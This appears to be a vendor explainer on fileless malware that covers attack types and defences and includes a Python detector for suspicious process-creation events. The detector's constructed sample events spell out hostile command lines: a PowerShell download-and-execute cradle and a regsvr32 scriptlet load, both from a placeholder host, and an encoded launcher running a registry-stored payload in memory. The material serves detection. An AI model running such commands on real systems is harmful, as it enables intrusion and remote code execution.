Fileless malware is a significant threat that is difficult to detect. A secondary concern is that it can often bypass existing security controls by running inside legitimate programs, so the attack surface it uses is the trusted software already present on the machine. Fileless malware is not always easy to understand. Here we look closer at fileless malware and the different ways it compromises users.
What is Fileless Malware?
Fileless malware is malicious software that does not need to install a file on the computer. It hides in the system by piggybacking on legitimate programs, which it uses to perform its malicious activity. It is memory-based rather than file-based, so it leaves little or no footprint on disk for file-based detection to find.
Fileless malware is malicious code injected into a running process and executed only in RAM. It typically exploits a vulnerability in the system or an application, or abuses a built-in scripting host such as PowerShell, and writes itself directly into memory. Fileless attacks can also be hidden in documents, for example as a macro that launches a script without ever dropping an executable.
What does Fileless Malware do?
Like regular malware, fileless malware uses the computer's system software, applications and protocols to carry out its malicious activity. Because it lives only in memory, its activity ends when the system reboots unless the attacker has set up a persistence mechanism, such as a registry entry, to relaunch it.
Examples of how such attacks begin and what they do:
- Phishing emails, carrying a link or a document that launches a script
- Malicious downloads
- Malicious code injection into already installed applications
- Legitimate-looking malicious websites that run code in the browser's memory
- Exploiting a system vulnerability
- Using the initial access to steal credentials or information
What are the types of Fileless Malware attacks?
Script-based attacks
A script-based attack is not completely fileless but is still difficult to spot. SamSam ransomware is a frequently cited example of a semi-fileless attack: the payload is delivered in a form that cannot be analysed without the initial launch script, so the attack is best captured while it is happening.
Windows registry manipulation
This involves a malicious file (a dropper) that uses a normal Windows process to write fileless code into the registry, for example a script stored in a registry value and launched at logon by a Run key, so the malicious code survives a reboot without a file on disk.
Memory code injection
This hides malicious code in the memory of legitimate applications. Each time the targeted Windows process runs, the malware re-injects itself into the running process, so no malicious executable ever needs to sit on disk.
How to stay protected from Fileless Malware?
- Continuous monitoring for phishing emails, and awareness of the signs of a phishing email
- Continuous monitoring of incoming and outgoing network traffic
- Constant memory analysis, together with logging of process creation and script execution
- Care when downloading and installing new applications
- Keeping software applications up to date
- Keeping the browser up to date
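As an added example that is not from the original article: the Python script below ties the registry-manipulation launcher described above (an encoded PowerShell command that reads its payload out of a registry value and runs it in memory) to the monitoring advice in this list, by running concrete detection logic over process-creation log events. The events, the registry key HKCU:\Software\ExampleVendor and the example.invalid URLs are constructed for the example and are not real telemetry.

```python
"""Detect fileless-malware launch patterns in process-creation events.

Constructed example: the events below mimic the Image / ParentImage /
CommandLine fields of Sysmon Event ID 1 and are not from a real incident.
"""
import base64
import re
from typing import Optional

# Script hosts that fileless attacks abuse, and the Office parents that a
# document-borne attack typically launches them from.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "regsvr32.exe", "rundll32.exe"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Command-line indicators of code that is fetched or staged without a file on disk.
INDICATOR_PATTERNS = {
    "download_cradle": re.compile(r"downloadstring|invoke-webrequest|net\.webclient", re.I),
    "in_memory_exec": re.compile(r"\biex\b|invoke-expression|reflection\.assembly", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "registry_payload": re.compile(r"get-itemproperty|\bhk(?:cu|lm):|currentversion\\run", re.I),
    "scriptlet_url": re.compile(r"regsvr32.*/i:https?://|scrobj\.dll", re.I),
}
# Indicators strong enough to flag an event on their own.
STRONG = {"scriptlet_url", "office_spawned_script_host"}
# PowerShell accepts -e, -ec, -enc or -EncodedCommand followed by base64(UTF-16LE script).
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)


def encode_launcher(script: str) -> str:
    """Produce the -EncodedCommand argument exactly as a registry-resident
    launcher would: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_blob(blob: str) -> Optional[str]:
    """Reverse encode_launcher; None if the blob is not a valid encoded command."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except ValueError:  # binascii.Error and UnicodeDecodeError are both ValueErrors
        return None


def analyse_event(event: dict) -> dict:
    """Score one process-creation event for fileless-attack indicators."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    cmdline = event["CommandLine"]

    # Decode an encoded PowerShell command so the indicators see the real script,
    # and drop the base64 blob so it cannot produce accidental matches.
    decoded = None
    text = cmdline
    m = ENCODED_FLAG.search(cmdline)
    if m:
        decoded = decode_blob(m.group(1))
        if decoded is not None:
            text = cmdline[:m.start(1)] + decoded

    hits = [name for name, pat in INDICATOR_PATTERNS.items() if pat.search(text)]
    if decoded is not None:
        hits.append("encoded_command")
    if image in SCRIPT_HOSTS and parent in OFFICE_PARENTS:
        hits.append("office_spawned_script_host")
    hits.sort()
    suspicious = bool(STRONG & set(hits)) or len(hits) >= 2
    return {"image": image, "parent": parent, "decoded": decoded,
            "indicators": hits, "suspicious": suspicious}


def scan_events(events):
    """Analyse a batch of events; returns one result dict per event, in order."""
    return [analyse_event(e) for e in events]


# Hypothetical launcher a registry-manipulation dropper might plant: a Run key
# starts PowerShell, which reads the real payload from a registry value and
# runs it in memory. The key name is invented for this example.
LAUNCHER = ("IEX (Get-ItemProperty -Path 'HKCU:\\Software\\ExampleVendor' "
            "-Name Payload).Payload")

SAMPLE_EVENTS = [  # constructed, not real telemetry
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\nightly-backup.ps1"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + encode_launcher(LAUNCHER)},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "powershell.exe -nop -w hidden -c \"IEX (New-Object "
                    "Net.WebClient).DownloadString('http://example.invalid/stage.ps1')\""},
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "regsvr32.exe /s /n /u /i:http://example.invalid/payload.sct scrobj.dll"},
]

if __name__ == "__main__":
    for r in scan_events(SAMPLE_EVENTS):
        flag = "SUSPICIOUS" if r["suspicious"] else "ok"
        print(f"{flag:10} {r['parent']} -> {r['image']}: {', '.join(r['indicators']) or '-'}")
        if r["decoded"]:
            print("           decoded:", r["decoded"])
```

The first event (a scheduled backup script) produces no indicators, while the registry-resident launcher is only recognisable after its encoded command is decoded, which is why the script decodes before matching. The Office-spawned PowerShell and the regsvr32 scriptlet load are flagged on their parent/child relationship and command line alone, without any file on disk to scan.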
Fileless malware can be spotted, but it requires a layered approach. Many fileless attacks still rely on human vulnerability (opening the attachment, enabling the macro) to get their first foothold, which is why user behaviour is a central focus of cyber security.
With fileless malware, attackers have found a way to infect your computer without writing a file to disk. Book a demo to learn how you can improve the human part of your cyber security.